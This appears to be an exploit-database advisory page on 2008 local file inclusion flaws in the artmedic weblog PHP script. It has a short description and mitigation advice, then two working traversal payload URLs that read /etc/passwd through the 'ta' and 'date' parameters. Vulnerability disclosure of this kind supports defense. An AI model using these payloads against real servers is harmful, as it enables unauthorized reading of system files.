header-logo
Suggest Exploit
vendor:
artmedic weblog
by:
muuratsalo
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: artmedic weblog
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

artmedic weblog multiple local file inclusion vulnerabilities

The artmedic weblog is vulnerable to multiple local file inclusion vulnerabilities. An attacker can exploit these vulnerabilities by sending a specially crafted HTTP request containing directory traversal characters (e.g. '../') to the vulnerable web application. This can allow the attacker to view sensitive files on the server, such as the /etc/passwd file.

Mitigation:

The best way to mitigate local file inclusion vulnerabilities is to ensure that user input is properly sanitized and validated. Additionally, web applications should be configured to only allow access to files that are necessary for the application to function.
Source

Exploit-DB raw data:

artmedic weblog multiple local file inclusion vulnerabilities 

download   http://artmedic-phpscripts.de/index.php?did=artmedic_weblog.zip

author     muuratsalo
contact    muuratsalo[at]gmail.com

exploits   
http://localhost/artmedic_weblog/index.php?ta=../../../../../../../../../../etc/passwd%00
http://localhost/artmedic_weblog/artmedic_print.php?date=../../../../../../../../../../etc/passwd%00

# milw0rm.com [2008-02-14]